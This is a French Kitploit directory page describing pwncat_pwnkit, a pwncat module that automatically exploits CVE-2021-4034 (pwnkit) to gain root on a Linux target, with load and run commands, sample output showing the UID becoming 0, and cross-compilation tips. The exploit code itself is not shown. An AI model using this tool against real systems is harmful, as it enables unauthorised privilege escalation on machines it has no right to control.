Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pwncat_pwnkit — Module pwncat qui exploite automatiquement la CVE-2021-4034 (pwnkit) | Kitploit
Outils/GitHubGitHub/danaepp/pwncat_pwnkit
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'Intrusion
GitHubdanaepp/pwncat_pwnkit

pwncat_pwnkit

Module pwncat qui exploite automatiquement la CVE-2021-4034 (pwnkit)

Voir le dépôt
328il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

pwncat_pwnkit

asciicast

Introduction

Le but de ce module est de tenter d'exploiter CVE-2021-4034 (pwnkit) sur une cible lors de l'utilisation de pwncat.

Il n'est pas nécessaire de configurer des répertoires, de compiler du code source ou même d'avoir gcc sur la cible distante ; le module pwnkit s'en occupe automatiquement grâce au framework pwncat.

Configuration et utilisation

  • Copiez simplement pwnkit.py quelque part sur votre hôte où pwncat-cs est installé. ex : /home/user/pwncat_mods
  • Dans pwncat, tapez simplement : load /home/user/pwncat_mods
  • Pour confirmer que le module est chargé, tapez : search pwnkit. Vous devriez voir quelque chose comme ceci :
root@kitploit:~
(local) pwncat$ search pwnkit
                                                      Results                                                      
                   ╷                                                                                               
  Name             │ Description                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 to privesc to root
  • Pour exécuter, tapez simplement run pwnkit. Si cela réussit, vous devriez voir l'UID passer à 0, et vous être maintenant root. ex :
root@kitploit:~
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

Conseils

  • Si vous ne voulez pas toujours appeler load, vous pouvez faire en sorte que pwncat charge automatiquement ce module au démarrage en le plaçant dans ~/.local/share/pwncat/modules
  • Pour utiliser le compilateur croisé afin de construire l'exploit sur votre machine et de l'envoyer sur la cible, vous devez définir la variable cross dans votre fichier pwncatrc. Ce fichier se trouve généralement dans ~/.local/share/pwncat/pwncatrc`. ex :
root@kitploit:~
# Set the gcc path
set cross "/usr/bin/gcc"

Remerciements

Un grand merci à Caleb Stewart pour son aide précieuse alors que j'apprenais le framework pwncat d'un point de vue développeur. Je ferai une pull request pour intégrer ce module dans le module escalate principal de pwncat un jour, quand j'aurai du temps libre... Je le promets. :-)

Télécharger l’outil